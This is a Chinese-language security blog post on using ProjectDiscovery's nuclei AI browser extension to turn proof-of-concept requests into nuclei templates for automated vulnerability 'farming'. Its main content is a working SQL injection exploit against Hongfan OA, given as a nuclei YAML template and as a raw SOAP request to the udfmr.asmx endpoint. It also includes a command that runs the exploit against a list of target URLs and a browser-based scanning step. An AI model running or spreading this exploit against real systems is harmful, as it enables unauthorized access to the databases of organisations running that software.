nuclei+ai 解放双手,自动刷洞,同时poc共享!!

nuclei+ai 解放双手,自动刷洞,同时poc共享!!

朱厌安全 2024-09-22 18:24

背景

之前在github上看到了nuclei新推出的一个浏览器插件,nuclei ai可以利用浏览器浏览器和ai直接对poc数据包生成合适的yaml文件,在星球内进行代shua poc的时候发现很多师傅不会写yaml,故写这篇文章,希望可以利用这个浏览器插件方便大家~~

2. 项目地址

项目地址:https://github.com/projectdiscovery/nuclei-ai-extension

官方地址:https://cloud.projectdiscovery.io/template

3. 自动生成yaml+浏览器快捷检验

在网上寻找相关的poc,并使用nuclei ai进行poc生成,同时再自己进行一些修改,即可

最后得到的poc

id: hongfansql

info:
  name: 红帆oa Sql注入
  author: fkalis
  severity: high
  reference: https://blog.csdn.net/qq_41904294/article/details/132365842

http:
  - method: POST
    path:
      - "{{BaseURL}}/iOffice/prg/set/wss/udfmr.asmx"

    headers:
      Content-Type: text/xml; charset=utf-8
      SOAPAction: "http://tempuri.org/ioffice/udfmr/GetEmpSearch"

    body: |      <?xml version="1.0" encoding="utf-8"?>      <soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">        <soap:Body>          <GetEmpSearch xmlns="http://tempuri.org/ioffice/udfmr">            <condition>1=user_name()</condition>          </GetEmpSearch>        </soap:Body>      </soap:Envelope>    matchers:
      # Add your desired matcher(s) here, for example:
      - type: word
        words:
          - "SqlException"
        part: body
      - type: status
        status:
          - 500

tips:在运行poc的时候可能会遇到报错,可以使用-validate 对报错进行查看

有错误:

修改后:

运行poc查看效果

nuclei -t “hongfan Sql注入.yaml” -l url.txt -v

漏洞复现检验

POST /iOffice/prg/set/wss/udfmr.asmx HTTP/1.1
Host: your-ip
Content-Type: text/xml; charset=utf-8
SOAPAction: "http://tempuri.org/ioffice/udfmr/GetEmpSearch"
 
<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <GetEmpSearch xmlns="http://tempuri.org/ioffice/udfmr">
      <condition>1=user_name()</condition>
    </GetEmpSearch>
  </soap:Body>
</soap:Envelope>

http://xxx.xxx.xxxx:9980/ioffice/

执行poc:

使用浏览器进行快捷漏洞检验

打开poc列表

选中刚刚的写好的poc,或者网上的poc

将目标站点放在target中,并点击scan

可以看见攻击的请求和响应判断攻击是否成功

请求包

响应包

3. nuclei ai poc分享

支持对自己编写的poc进行连接分享

访问分享的连接即可获取到poc

https://cloud.projectdiscovery.io/xxx.xxx

当然也可以关闭对poc的分享